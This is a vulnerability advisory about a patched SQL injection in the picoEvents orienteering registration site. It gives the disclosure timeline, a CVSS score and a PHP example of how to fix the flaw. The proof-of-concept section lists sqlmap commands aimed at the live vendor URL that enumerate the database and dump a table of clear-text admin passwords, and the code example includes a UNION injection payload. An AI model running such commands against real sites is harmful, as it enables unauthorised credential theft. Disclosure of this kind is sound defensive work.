entry.picoevents.ch - SQL-Injection Vulnerability (#mvid6)
Document Title:
===============
entry.picoevents.ch - SQL-Injection Vulnerability
mosi Vulnerability ID (mvid):
===============
6
Discovery Status:
=============
Patched - Public Disclosure
CVSSv2 Overall Score:
===============
9.6
CVSSv2 Vector:
==============
(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
Product & Service Introduction:
==============
picoEvents provides an online registration and live results service that simplifies timekeeping at orienteering events using SPORTident.
http://picoevents.ch/
Abstract:
==============
Simon Monai, together with Timo Kübler and Namo Flury, found a SQL injection vulnerability in the web registration form. Before it was reported, the flaw had already been abused to delete the competitions stored in the database on the web server.
Report Timeline:
==============
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledged
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure
Affected Products:
=============
entry.picoevents.ch - Multisport Registration Page
Exploitation Technique:
=============
SQL Injection
Security Level:
=============
Critical
Technical Details & Description:
=============
Request method(s):
[+] GET
Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95
Proof of Concept (PoC):
=============
Running the following sqlmap commands from the shell of a Kali Linux installation retrieves the administrator account passwords (enumerate databases, then tables, then the columns of the admin table, then dump it):
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump
The results are alarming: the administrator passwords are stored in clear text, so anyone who extracts them can log into the administrator interface and make changes.
Possible Solution:
============
Validate the GET parameters (recordID must be an integer) and pass them to the database through parameterised queries instead of concatenating them into the SQL string; store password hashes instead of clear-text passwords. A WAF can help to block further attacks, but it is not a substitute for fixing the code.
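The fix in code, as an added example that is not picoEvents' own code: the vulnerable concatenation pattern next to a hardened handler that checks the type of recordID and binds it in a PDO prepared statement, plus hashed password storage for the admin table. The table and column names (competitions, admin, password_hash), the constructed UNION payload and the in-memory SQLite setup are assumptions for illustration; the production schema and database engine are not known from this report, but the same PDO calls apply to MySQL.

```php
<?php
// Added example, not picoEvents' code. Table and column names are assumed.

// --- Vulnerable pattern: the untrusted GET value is concatenated into SQL ---
function lookupVulnerable(PDO $db, array $get): array
{
    // recordID=95 works as intended, but anything after the number is also
    // handed to the database unchanged, so a UNION or a DELETE goes through.
    $sql = "SELECT id, name FROM competitions WHERE id = " . $get['recordID'];
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened: validate the type first, then bind the value as a parameter ---
function lookupHardened(PDO $db, array $get): array
{
    $id = filter_var($get['recordID'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);   // reject non-integer input instead of querying
        return [];
    }
    $stmt = $db->prepare('SELECT id, name FROM competitions WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Password storage: hash on write, verify on login, never store clear text ---
function storeAdminPassword(PDO $db, string $user, string $password): void
{
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE admin SET password_hash = :h WHERE username = :u');
    $stmt->execute([':h' => $hash, ':u' => $user]);
}

function checkAdminLogin(PDO $db, string $user, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM admin WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

// Constructed demo schema in an in-memory SQLite database (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE competitions (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO competitions VALUES (95, 'Multisport 2017')");
$db->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password_hash TEXT)');
$db->exec("INSERT INTO admin VALUES ('admin', '')");
storeAdminPassword($db, 'admin', 's3cret');

// Constructed attack input: a UNION that reads the admin table through recordID,
// which is what the sqlmap --dump step above does automatically.
$attack = ['recordID' => '95 UNION SELECT username, password_hash FROM admin'];

var_dump(lookupVulnerable($db, $attack));   // the UNION is executed by the database
var_dump(lookupHardened($db, $attack));     // the input fails the integer check
var_dump(checkAdminLogin($db, 'admin', 's3cret'));
```

The integer check alone would already stop this particular payload, but the prepared statement is what makes the handler safe for string parameters too, so both belong in the fix. With hashed storage, a future dump of the admin table yields password hashes rather than reusable credentials.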
Security Risk:
============
This vulnerability is rated critical (CVSSv2 9.6) and had already been abused before it was reported.
Author / Credits:
============
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)
Public Disclosure:
============
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40
----------------------------
https://jongliertricks.ch/mosi-security-research